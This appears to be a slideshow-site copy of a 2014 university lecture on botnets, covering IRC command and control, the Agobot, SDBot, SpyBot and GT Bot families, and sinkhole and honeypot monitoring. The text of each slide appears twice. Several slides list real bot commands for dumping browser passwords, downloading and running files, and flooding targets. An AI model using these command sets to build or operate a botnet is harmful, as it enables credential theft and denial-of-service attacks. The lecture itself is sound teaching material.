Cyber. SE URITY FOR COMPUTER botnets.ppt
TamilSelvi165
0 views
26 slides
Oct 15, 2025
Slide 1 of 26
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
About This Presentation
Botnet
Slide Content
CAP6135: Malware and Software
Vulnerability Analysis
Botnets
Cliff Zou
Spring 2014
Vulnerability Analysis
Botnets
Cliff Zou
Spring 2014
2
Acknowledgement
This lecture uses some contents from the lecture
notes from:
Dr. Dawn Song: CS161: computer security
Richard Wang – SophosLabs: The Development of Botnets
Randy Marchany - VA Tech IT Security Lab: Botnets
Acknowledgement
This lecture uses some contents from the lecture
notes from:
Dr. Dawn Song: CS161: computer security
Richard Wang – SophosLabs: The Development of Botnets
Randy Marchany - VA Tech IT Security Lab: Botnets
3
Botnets
Collection of compromised hosts
Spread like worms and viruses
Once installed, respond to remote commands
A network of ‘bots’
robot :
an automatic machine that can be
programmed to perform specific tasks.
Also known as ‘zombies’
Botnets
Collection of compromised hosts
Spread like worms and viruses
Once installed, respond to remote commands
A network of ‘bots’
robot :
an automatic machine that can be
programmed to perform specific tasks.
Also known as ‘zombies’
4
Platform for many attacks
Spam forwarding (70% of all spam?)
Click fraud
Keystroke logging
Distributed denial of service attacks
Serious problem
Top concern of banks, online merchants
Vint Cerf: ¼ of hosts connected to Internet
Platform for many attacks
Spam forwarding (70% of all spam?)
Click fraud
Keystroke logging
Distributed denial of service attacks
Serious problem
Top concern of banks, online merchants
Vint Cerf: ¼ of hosts connected to Internet
5
What are botnets used for?
What are botnets used for?
6
IRC (Internet Relay Chat) based Control
IRC (Internet Relay Chat) based Control
7
IRC (Internet Relay Chat) based Control
IRC (Internet Relay Chat) based Control
8
Why IRC?
IRC servers are:
freely available
easy to manage
easy to subvert
Attackers have experience with IRC
IRC bots usually have a way to remotely
upgrade victims with new payloads to
stay ahead of security efforts
Why IRC?
IRC servers are:
freely available
easy to manage
easy to subvert
Attackers have experience with IRC
IRC bots usually have a way to remotely
upgrade victims with new payloads to
stay ahead of security efforts
9
How bad is the problem?
Symantec identified a 400K node botnet
Netadmin in the Netherlands
discovered 1-2M unique IPs associated
with Phatbot infections.
Phatbot harvests MyDoom and Bagel
infected machines.
Researchers in Gtech monitored
thousands of botnets
How bad is the problem?
Symantec identified a 400K node botnet
Netadmin in the Netherlands
discovered 1-2M unique IPs associated
with Phatbot infections.
Phatbot harvests MyDoom and Bagel
infected machines.
Researchers in Gtech monitored
thousands of botnets
10
Spreading Problem
Spreading mechanism is a leading
cause of background noise
Port 445, 135, 139, 137 accounted for 80%
of traffic captured by German Honeynet
Project
Other ports
2745 – bagle backdoor
3127 – MyDoom backdoor
3410 – Optix trojan backdoor
5000 – upnp vulnerability
Spreading Problem
Spreading mechanism is a leading
cause of background noise
Port 445, 135, 139, 137 accounted for 80%
of traffic captured by German Honeynet
Project
Other ports
2745 – bagle backdoor
3127 – MyDoom backdoor
3410 – Optix trojan backdoor
5000 – upnp vulnerability
Most commonly used Bot families
Agobot
SDBot
SpyBot
GT Bot
Agobot
SDBot
SpyBot
GT Bot
Agobot
Most sophisticated
20,000 lines C/C++ code
IRC based command/control
Large collection of target exploits
Capable of many DoS attack types
Shell encoding/polymorphic obfuscation
Traffic sniffers/key logging
Defend/fortify compromised system
Ability to frustrate dissassembly
Most sophisticated
20,000 lines C/C++ code
IRC based command/control
Large collection of target exploits
Capable of many DoS attack types
Shell encoding/polymorphic obfuscation
Traffic sniffers/key logging
Defend/fortify compromised system
Ability to frustrate dissassembly
SDBot
Simpler than Agobot, 2,000 lines C code
Non-malicious at base
Utilize IRC-based command/control
Easily extended for malicious purposes
Scanning
DoS Attacks
Sniffers
Information harvesting
Encryption
Simpler than Agobot, 2,000 lines C code
Non-malicious at base
Utilize IRC-based command/control
Easily extended for malicious purposes
Scanning
DoS Attacks
Sniffers
Information harvesting
Encryption
SpyBot
<3,000 lines C code
Possibly evolved from SDBot
Similar command/control engine
No attempts to hide malicious purposes
<3,000 lines C code
Possibly evolved from SDBot
Similar command/control engine
No attempts to hide malicious purposes
GT Bot
Functions based on mIRC scripting
capabilities
HideWindow program hides bot on local
system
Basic rootkit function
Port scanning, DoS attacks, exploits for
RPC and NetBIOS
Functions based on mIRC scripting
capabilities
HideWindow program hides bot on local
system
Basic rootkit function
Port scanning, DoS attacks, exploits for
RPC and NetBIOS
Variance in codebase size, structure,
complexity, implementation
Convergence in set of functions
Possibility for defense systems effective across bot
families
Bot families extensible
Agobot likely to become dominant
Variance in codebase size, structure,
complexity, implementation
Convergence in set of functions
Possibility for defense systems effective across bot
families
Bot families extensible
Agobot likely to become dominant
All of the above use IRC for command/control
Disrupt IRC, disable bots
Sniff IRC traffic for commands
Shutdown channels used for Botnets
IRC operators play central role in stopping
botnet traffic
But a botnet could use its own IRC server
Automated traffic identification required
Future botnets may move away from IRC
Move to P2P communication
Traffic fingerprinting still useful for identification
Control
All of the above use IRC for command/control
Disrupt IRC, disable bots
Sniff IRC traffic for commands
Shutdown channels used for Botnets
IRC operators play central role in stopping
botnet traffic
But a botnet could use its own IRC server
Automated traffic identification required
Future botnets may move away from IRC
Move to P2P communication
Traffic fingerprinting still useful for identification
Control
Host control
Fortify system against other malicious attacks
Disable anti-virus software
Harvest sensitive information
PayPal, software keys, etc.
Economic incentives for botnets
Stresses need to patch/protect systems prior
to attack
Stronger protection boundaries required
across applications in OSes
Fortify system against other malicious attacks
Disable anti-virus software
Harvest sensitive information
PayPal, software keys, etc.
Economic incentives for botnets
Stresses need to patch/protect systems prior
to attack
Stronger protection boundaries required
across applications in OSes
19
Example Botnet Commands
Connection
CLIENT: PASS <password>
HOST : (if error, disconnect)
CLIENT: NICK <nick>
HOST : NICKERROR | CONNECTED
Pass hierarchy info
BOTINFO <nick> <connected_to> <priority>
BOTQUIT <nick>
Example Botnet Commands
Connection
CLIENT: PASS <password>
HOST : (if error, disconnect)
CLIENT: NICK <nick>
HOST : NICKERROR | CONNECTED
Pass hierarchy info
BOTINFO <nick> <connected_to> <priority>
BOTQUIT <nick>
20
Example Botnet Commands
IRC Commands
CHANJOIN <tag> <channel>
CHANPART <tag> <channel>
CHANOP <tag> <channel>
CHANKICK <tag> <channel>
CHANBANNED <tag> <channel>
CHANPRIORITY <ircnet> <channel>
<LOW/NORMAL/HIGH>
Example Botnet Commands
IRC Commands
CHANJOIN <tag> <channel>
CHANPART <tag> <channel>
CHANOP <tag> <channel>
CHANKICK <tag> <channel>
CHANBANNED <tag> <channel>
CHANPRIORITY <ircnet> <channel>
<LOW/NORMAL/HIGH>
21
Example Botnet Commands
pstore
Display all usernames/passwords stored in
browsers of infected systems
bot.execute
Run executable on remote system
bot.open
Reads file on remote computer
bot.command
Runs command with system()
Example Botnet Commands
pstore
Display all usernames/passwords stored in
browsers of infected systems
bot.execute
Run executable on remote system
bot.open
Reads file on remote computer
bot.command
Runs command with system()
22
Example Botnet Commands
http.execute
Download and execute file through http
ftp.execute
ddos.udpflood
ddos.synflod
ddos.phaticmp
redirect.http
redirect.socks
Example Botnet Commands
http.execute
Download and execute file through http
ftp.execute
ddos.udpflood
ddos.synflod
ddos.phaticmp
redirect.http
redirect.socks
23
Current Botnet Control Architecture
bot bot
C&C
botmaster
bot
C&C
•More than one C&C server
•Spread all around the world
Current Botnet Control Architecture
bot bot
C&C
botmaster
bot
C&C
•More than one C&C server
•Spread all around the world
24
Botnet Monitor: Gatech KarstNet
A lot bots use Dyn-DNS
name to find C&C
bot
bot
C&C
attacker
C&C
KarstNet sinkhole
cc1.com
KarstNet informs DNS provider of
cc1.com
Detect cc1.com by its abnormal DNS queries
DNS provider maps
cc1.com to Gatech sinkhole
(DNS hijack)
bot
All/most bots attempt to
connect the sinkhole
Botnet Monitor: Gatech KarstNet
A lot bots use Dyn-DNS
name to find C&C
bot
bot
C&C
attacker
C&C
KarstNet sinkhole
cc1.com
KarstNet informs DNS provider of
cc1.com
Detect cc1.com by its abnormal DNS queries
DNS provider maps
cc1.com to Gatech sinkhole
(DNS hijack)
bot
All/most bots attempt to
connect the sinkhole
Botnet Monitor: Honeypot Spy
Security researchers set up honeypots
Honeypots: deliberately set up vulnerable machines
When compromised, put close monitoring of malware’s behaviors
Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing%29
When compromised honeypot joins a botnet
Passive monitoring: log all network traffic
Active monitoring: actively contact other bots to obtain more
information (neighborhood list, additional c&c, etc.)
Representative research paper:
A multifaceted approach to understanding the botnet phenomenon,
Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis,
Andreas, 6th ACM SIGCOMM conference on Internet measurement (IMC),
2006.
25
Security researchers set up honeypots
Honeypots: deliberately set up vulnerable machines
When compromised, put close monitoring of malware’s behaviors
Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing%29
When compromised honeypot joins a botnet
Passive monitoring: log all network traffic
Active monitoring: actively contact other bots to obtain more
information (neighborhood list, additional c&c, etc.)
Representative research paper:
A multifaceted approach to understanding the botnet phenomenon,
Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis,
Andreas, 6th ACM SIGCOMM conference on Internet measurement (IMC),
2006.
25
26
The Future Generation of Botnets
Peer-to-Peer C&C
Polymorphism
Anti-honeypot
Rootkit techniques
The Future Generation of Botnets
Peer-to-Peer C&C
Polymorphism
Anti-honeypot
Rootkit techniques
Tags
Categories
TechnologyDownload
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 0
- Slides 26
- Age 56 days
Related Slideshows
11
8-top-ai-courses-for-customer-support-representatives-in-2025.pptx
JeroenErne2
61 views
10
7-essential-ai-courses-for-call-center-supervisors-in-2025.pptx
JeroenErne2
56 views
13
25-essential-ai-courses-for-user-support-specialists-in-2025.pptx
JeroenErne2
44 views
11
8-essential-ai-courses-for-insurance-customer-service-representatives-in-2025.pptx
JeroenErne2
45 views
21
Know for Certain
DaveSinNM
28 views
17
PPT OPD LES 3ertt4t4tqqqe23e3e3rq2qq232.pptx
novasedanayoga46
31 views